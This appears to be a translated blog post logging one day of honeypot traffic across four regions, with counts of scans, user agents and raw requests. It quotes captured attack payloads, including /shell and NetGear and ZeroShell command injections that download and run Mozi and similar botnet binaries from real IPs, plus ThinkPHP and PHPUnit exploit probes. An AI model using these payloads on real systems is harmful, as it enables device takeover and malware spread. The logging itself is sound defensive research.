コンニチハレバレトシタアオゾラ

In idle hours, facing my blog all day long, jotting down at random whatever trifles drift through my mind,

2021/06/29 Honeypot (provisional) observation record

This is the honeypot (provisional) observation record for 2021/06/29.

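Highlights
Common

Access targeting a GPON router vulnerability
Access targeting the Liferay Portal JSON Web Service vulnerability (CVE-2020-7961)
Access targeting the PHPUnit vulnerability (CVE-2017-9841)
Access targeting a ThinkPHP vulnerability
Scanning by zgrab
Scanning for Apache Solr
Scanning for Apache Tomcat
Scanning for Laravel
Scanning for WordPress plugins

Location:JP

The following were observed:

Access targeting the ZeroShell Linux Router vulnerability (CVE-2020-29390)
Access targeting cloud environment metadata
Scanning for /.env
Access with the UserAgent Hello, World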

The following access to /shell was observed:

cd /tmp;
rm -rf *;
wget  162.55.171.138/jaws;
sh /tmp/jaws

Location:US

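The following were observed:

Access targeting a vulnerability in DrayTek products
Access targeting a Drupal vulnerability
Access targeting a vulnerability in NetGear products
Access targeting a Spring Boot vulnerability
Scanning by Nmap Scripting Engine
Scanning by XTC
Scanning by ZmEu
Scanning for .css
Scanning for .js
Scanning for /.env
Scanning for phpMyAdmin
Scanning for WordPress
Access with the UserAgent Hello, world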

The following access to /shell was observed:

cd /tmp;
rm -rf *;
wget 104.168.98.105/bins/z0r0.arm7;
chmod 777 /tmp/z0r0.arm7;
sh /tmp/z0r0.arm7 7Binks.Rep.Jaws

Location:UK

The following were observed:

Access with the UserAgent Hello, World
Access with the UserAgent Hello, world

The following access to /shell was observed:

cd /tmp;
rm -rf *;
wget http[:]//27[.]45[.]90[.]190:45806/Mozi.a;
chmod 777 Mozi.a;
/tmp/Mozi.a jaws

Location:SG

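The following were observed:

Access targeting a vulnerability in NetGear products
Access targeting a Spring Boot vulnerability
Scanning by Nmap Scripting Engine
Scanning by Wget
Scanning for /.env
Scanning for phpMyAdmin
Access with the UserAgent Hello, World
Access with the UserAgent Hello, world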

The following access to /shell was observed:

cd /tmp;
rm -rf *;
wget http[:]//115[.]61[.]160[.]112:33077/Mozi.a;
chmod 777 Mozi.a;
/tmp/Mozi.a jaws

Access count trends

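JP: total accesses: 52 (vs. previous day: -18)
US: total accesses: 234 (vs. previous day: +191)
UK: total accesses: 38 (vs. previous day: -4)
SG: total accesses: 52 (vs. previous day: +11)

For practical reasons, GET / HTTP/1.1 and POST / HTTP/1.1 are excluded.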

Location:JP

Source IP address list


UserAgent list

Count UserAgent
19 -
4 Chrome/54.0 (Windows NT 10.0)
1 Hello, World
11 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE
8 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
4 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
1 Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)
3 Mozilla/5.0 zgrab/0.x

Request list

Count Method Request Protocol
1
1 \x16\x03
3 \x16\x03\x01\x01\xfa\x01
1 \x16\x03\x02\x01o\x01
8 GET /.env HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1
1 GET /_ignition/execute-solution HTTP/1.1
1 GET /boaform/admin/formLogin?username=user&psd=user HTTP/1.0
10 GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5.206.227.228%2Fzero;sh%20zero;%22 HTTP/1.0
1 GET /console/ HTTP/1.1
3 GET /favicon.ico HTTP/1.1
1 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21 HTTP/1.1
1 GET /manager/html HTTP/1.1
1 GET /manager/text/list HTTP/1.1
1 GET /portal/redlion HTTP/1.1
1 GET /shell?cd+/tmp;rm+-rf+*;wget+ 162.55.171.138/jaws;sh+/tmp/jaws
1 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1
1 GET http[:]//169[.]254[.]169[.]254/latest/meta-data/ HTTP/1.1
2 HEAD / HTTP/1.1
1 POST /Autodiscover/Autodiscover.xml HTTP/1.1
1 POST /GponForm/diag_Form?images/ HTTP/1.1
1 POST /HNAP1/ HTTP/1.0
1 POST /api/jsonws/invoke HTTP/1.1
4 POST /boaform/admin/formLogin HTTP/1.1
1 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1

Location:US

Source IP address list


UserAgent list

Count UserAgent
58 -
1 Hello, world
1 Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30
2 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:78.0) Gecko/20100101 Firefox/78.0
2 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 OPR/56.0.3051.52
117 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
22 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1
1 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE
9 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
5 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
4 Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)
3 Mozilla/5.0 zgrab/0.x
1 Wget/1.18 (linux-gnu)
1 XTC
6 ZmEu

Request list

Count Method Request Protocol
31 -
1 \x16\x03\x01\x014\x01
15 \x16\x03\x01\x01\xfb\x01
3 \x16\x03\x01\x02
1 27;wget%20http[:]//%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0
1 CONNECT www[.]bing[.]com/:443 HTTP/1.1
10 GET /.env HTTP/1.1
2 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
2 GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1
1 GET /Content/common/web/CommonActivity.css HTTP/1.1
1 GET /Content/css/wzwstylel.css HTTP/1.1
1 GET /Content/favicon.ico HTTP/1.1
1 GET /Css/Hm.css HTTP/1.1
1 GET /HNAP1 HTTP/1.1
1 GET /HNAP1/ HTTP/1.1
1 GET /Home/Bind/binding HTTP/1.1
1 GET /Home/Get/getJnd28 HTTP/1.1
1 GET /Home/GetAllGameCategory HTTP/1.1
1 GET /Home/Index/ajaxTJ HTTP/1.1
1 GET /JS/loginstatus.js HTTP/1.1
1 GET /MyAdmin/scripts/setup.php HTTP/1.1
1 GET /Pc/Lang/index.html HTTP/1.1
1 GET /Promotions/list.mvc HTTP/1.1
1 GET /Public/Home/images/game/pk10.png HTTP/1.1
1 GET /Public/Home/js/cls.js HTTP/1.1
1 GET /Public/Home/js/common.js HTTP/1.1
1 GET /Public/Mobile/ecshe_css/wapmain.css?v=1545408652 HTTP/1.1
1 GET /Public/home/js/check.js HTTP/1.1
1 GET /Public/home/wap/css/qdgame.css HTTP/1.1
1 GET /Public/initJs.php HTTP/1.1
1 GET /Public/js/common.js HTTP/1.1
1 GET /Public/mobile/js/config.js HTTP/1.1
1 GET /Recruit/download_url HTTP/1.1
1 GET /Template/Mobile/js/main.js HTTP/1.1
1 GET /Templates/user/finance/css/userPay.css HTTP/1.1
1 GET /Templates/user/js/global.js HTTP/1.1
2 GET /_ignition/execute-solution HTTP/1.1
1 GET /actuator/health HTTP/1.1
1 GET /admin/index HTTP/1.1
1 GET /ajax/allcoin_a/id/0?t=0.3782499195965951 HTTP/1.1
1 GET /ajax?act=getrlist&rid=1 HTTP/1.1
1 GET /api/ApiHub/fetchJinse HTTP/1.1
1 GET /api/apps HTTP/1.1
1 GET /api/contactWay HTTP/1.1
1 GET /api/content_bottom HTTP/1.1
1 GET /api/exclude/siteConfig/webSiteConfig HTTP/1.1
1 GET /api/message/webInfo HTTP/1.1
1 GET /api/product/topRank?token=null&uid=null&lang=null&direct=1&type=1 HTTP/1.1
1 GET /api/stock/getSingleStock.do?code=002405 HTTP/1.1
1 GET /api/uploads/apimap HTTP/1.1
1 GET /api/user/info?&&callback=jsonp_1601457046411_20983 HTTP/1.1
1 GET /api/v/index/queryOfficePage?officeCode=customHomeLink HTTP/1.1
1 GET /api/v1/invest HTTP/1.1
1 GET /api/v1/member/kefu HTTP/1.1
1 GET /api/wallet/redDetail HTTP/1.1
1 GET /assets/dist/static/js/vendor_prod.js HTTP/1.1
1 GET /assets/js/dmshub.js HTTP/1.1
1 GET /assets/room/css/room_mobile.css HTTP/1.1
1 GET /base/exchange_article/index/classid/1/id/1 HTTP/1.1
1 GET /base/exchange_index/changepwdfirst HTTP/1.1
1 GET /base/exchange_index/googlecode HTTP/1.1
1 GET /common/download.js HTTP/1.1
1 GET /common/template/lottery/lecai/css/style.css HTTP/1.1
1 GET /config.js HTTP/1.1
1 GET /config.php?_=3283&1922563758 HTTP/1.1
2 GET /console/ HTTP/1.1
1 GET /csjs/bankCheck.js HTTP/1.1
1 GET /css/dafa.css HTTP/1.1
1 GET /css/main.css HTTP/1.1
1 GET /css/style.css HTTP/1.1
1 GET /evox/about HTTP/1.1
3 GET /favicon.ico HTTP/1.1
1 GET /ff/css/cssy.css HTTP/1.1
1 GET /files/pub_rem.js HTTP/1.1
1 GET /files/pub_reset.css HTTP/1.1
1 GET /getConfig/getArticle.do?code=19 HTTP/1.1
1 GET /getConfig/listPopFrame.do?code=14&position=index&_=1601489645097 HTTP/1.1
1 GET /getLocale HTTP/1.1
2 GET /h5/ HTTP/1.1
1 GET /homes/ HTTP/1.1
1 GET /iframe/rankgiftgotapi/1005 HTTP/1.1
1 GET /im/in/GetUuid HTTP/1.1
2 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21 HTTP/1.1
1 GET /index/Mobile/kline_week?code=sz003043 HTTP/1.1
1 GET /index/index/andiro HTTP/1.1
1 GET /infe/rest/flash/getServerIP.json HTTP/1.1
1 GET /js/app.ling.js HTTP/1.1
1 GET /js/base.js HTTP/1.1
1 GET /js/dianzan.js HTTP/1.1
1 GET /js/tvConfig.js HTTP/1.1
1 GET /kkrps/im_group/show_members HTTP/1.1
1 GET /loan HTTP/1.1
1 GET /login/img/nyyh/chkjs.js HTTP/1.1
1 GET /login/img/nyyh/game.css HTTP/1.1
1 GET /m/ HTTP/1.1
1 GET /m/ticker/usdtqc HTTP/1.1
1 GET /manager/html HTTP/1.1
1 GET /manager/js/left.js HTTP/1.1
1 GET /mobile/script/main.m.js HTTP/1.1
1 GET /myadmin/scripts/setup.php HTTP/1.1
1 GET /nmaplowercheck1624917704 HTTP/1.1
1 GET /otc/ HTTP/1.1
1 GET /pages/console/js/common.js HTTP/1.1
1 GET /phpMyAdmin/scripts/setup.php HTTP/1.1
1 GET /phpmyadmin/scripts/setup.php HTTP/1.1
1 GET /pma/scripts/setup.php HTTP/1.1
1 GET /portal/index/protocol.html HTTP/1.1
1 GET /portal/redlion HTTP/1.1
1 GET /public/wap/js/basis.js HTTP/1.1
1 GET /resources/main/common.js HTTP/1.1
1 GET /room/1002 HTTP/1.1
1 GET /s_api/basic/config_js?callback=__set_config HTTP/1.1
1 GET /s_api/basic/download/info HTTP/1.1
1 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
1 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//1[.]10[.]150[.]40:43543/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
1 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//45[.]229[.]54[.]111:53995/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
1 GET /shell?cd+/tmp;rm+-rf+*;wget+104.168.98.105/bins/z0r0.arm7;chmod+777+/tmp/z0r0.arm7;sh+/tmp/z0r0.arm7+7Binks.Rep.Jaws HTTP/1.1
1 GET /site.js HTTP/1.1
1 GET /site/get-hq?proNo=btc&panType=1&pid=1 HTTP/1.1
1 GET /skin/js/common.js HTTP/1.1
2 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET /static/css/index.css HTTP/1.1
1 GET /static/data/thirdgames.json HTTP/1.1
1 GET /static/guide/ab.css HTTP/1.1
1 GET /static/home/static/js/login.js HTTP/1.1
1 GET /static/index/js/lk/order.js HTTP/1.1
1 GET /static/wap/css/index.css HTTP/1.1
1 GET /static/wap/js/common.js HTTP/1.1
1 GET /static/xianyu/js/bankCheck.js HTTP/1.1
1 GET /stock/search.html?keyword=00202 HTTP/1.1
1 GET /style.css HTTP/1.1
1 GET /template/920ka/css/lsy.css HTTP/1.1
1 GET /template/920ka/js/woodyapp.js HTTP/1.1
1 GET /thriveGame.css HTTP/1.1
1 GET /user/Login HTTP/1.1
2 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1
1 GET /wap/api/exchangerateuserconfig!get.action HTTP/1.1
1 GET /wap/trading/get_newallorder_ajax HTTP/1.1
1 GET /wap/trading/lastKlineParameter HTTP/1.1
1 GET /web/api/getBanner HTTP/1.1
2 GET /wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1
1 GET /wp-login.php HTTP/1.1
1 GET /ws/index/getTheLotteryInitList HTTP/1.1
1 GET /xy/image/jiantou.png HTTP/1.1
1 GET http[:]//www[.]bing[.]com/ HTTP/1.1
1 OPTIONS / HTTP/1.0
2 POST /Autodiscover/Autodiscover.xml HTTP/1.1
2 POST /HNAP1/ HTTP/1.0
2 POST /api/jsonws/invoke HTTP/1.1
1 POST /api/system/system/config/get HTTP/1.1
5 POST /boaform/admin/formLogin HTTP/1.1
1 POST /cgi-bin/mainfunction.cgi HTTP/1.1
1 POST /config HTTP/1.1
1 POST /login/kefuxian.mvc HTTP/1.1
1 POST /m.api HTTP/1.1
1 POST /sdk HTTP/1.1
1 POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1
2 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST http[:]//withthis[.]site/7229ebd93edecfa44c3a78bc9bad771920404c83330a318129cac9fd0619797b6f9086bedce0d3cbf64825016d01bc06aa24cec28224599f5a6997cadcf14c70ab03ef943e1b3ac29989c7a28be7e5215140c1e8bf550b55221f7eb21e343913 HTTP/1.1

Location:UK

Source IP address list


UserAgent list

Count UserAgent
6 -
1 Go-http-client/1.1
1 Hello, World
1 Hello, world
11 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
9 Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)
6 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
2 Mozilla/5.0 zgrab/0.x
1 python-requests/2.18.4

Request list

Count Method Request Protocol
1 \x16\x03\x01\x01\xfc\x01
1 27;wget%20http[:]//%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1
1 GET /TP/html/public/index.php HTTP/1.1
1 GET /TP/index.php HTTP/1.1
1 GET /TP/public/index.php HTTP/1.1
2 GET /_ignition/execute-solution HTTP/1.1
1 GET /boaform/admin/formLogin?username=ec8&psd=ec8 HTTP/1.0
1 GET /console/ HTTP/1.1
1 GET /elrekt.php HTTP/1.1
1 GET /html/public/index.php HTTP/1.1
1 GET /index.php HTTP/1.1
1 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21 HTTP/1.1
1 GET /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 HTTP/1.1
1 GET /manager/html HTTP/1.1
1 GET /manager/text/list HTTP/1.1
1 GET /nice%20ports%2C/Tri%6Eity.txt%2ebak HTTP/1.0
1 GET /public/index.php HTTP/1.1
1 GET /shell?cd+/tmp;rm+-rf+*;wget+http[:]//27[.]45[.]90[.]190:45806/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
1 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET /thinkphp/html/public/index.php HTTP/1.1
1 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1
1 HEAD / HTTP/1.0
1 POST /Autodiscover/Autodiscover.xml HTTP/1.1
1 POST /GponForm/diag_Form?images/ HTTP/1.1
1 POST /HNAP1/ HTTP/1.0
1 POST /api/jsonws/invoke HTTP/1.1
6 POST /boaform/admin/formLogin HTTP/1.1
1 POST /index.php?s=captcha HTTP/1.1
1 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1

Location:SG

Source IP address list


UserAgent list

Count UserAgent
11 -
1 Hello, World
1 Hello, world
2 Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30
2 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3; rv:52.7.2) Gecko/20100101 Firefox/52.7.2
3 Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3464.0 Safari/537.36
11 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE
5 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
8 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
3 Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)
3 Mozilla/5.0 zgrab/0.x
1 Wget/1.18 (linux-gnu)

Request list

Count Method Request Protocol
1 \x03
1 \x16\x03\x01\x014\x01
6 \x16\x03\x01\x02
1 CONNECT www[.]bing[.]com/:443 HTTP/1.1
6 GET /.env HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1
1 GET /_ignition/execute-solution HTTP/1.1
1 GET /actuator/health HTTP/1.1
1 GET /console/ HTTP/1.1
1 GET /evox/about HTTP/1.1
2 GET /favicon.ico HTTP/1.1
1 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1
1 GET /manager/text/list HTTP/1.1
1 GET /nmaplowercheck1624859870 HTTP/1.1
1 GET /phpmyadmin/index.php HTTP/1.1
1 GET /phpmyadmin4.8.5/index.php HTTP/1.1
1 GET /pmd/index.php HTTP/1.1
1 GET /portal/redlion HTTP/1.1
1 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//59[.]94[.]203[.]148:53380/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
1 GET /shell?cd+/tmp;rm+-rf+*;wget+http[:]//115[.]61[.]160[.]112:33077/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
1 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1
1 GET http[:]//passport[.]baidu[.]com/ HTTP/1.1
1 GET http[:]//www[.]bing[.]com/ HTTP/1.1
1 HEAD / HTTP/1.1
1 POST /Autodiscover/Autodiscover.xml HTTP/1.1
1 POST /GponForm/diag_Form?images/ HTTP/1.1
1 POST /api/jsonws/invoke HTTP/1.1
8 POST /boaform/admin/formLogin HTTP/1.1
1 POST /sdk HTTP/1.1
1 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST http[:]//impius[.]fun/0ccf4fab7bf74a3889c531a3db740b505ff3f867983de8f497cccf7f74041aa1238ff65fe62f01f240e5d6519920dffed2388471fbfcacd9cc03eaf0700820e5cc5b3118b9883e5c4ac5079e35c16fbb317e3ce92d3fbc8f5b226655dfd78187 HTTP/1.1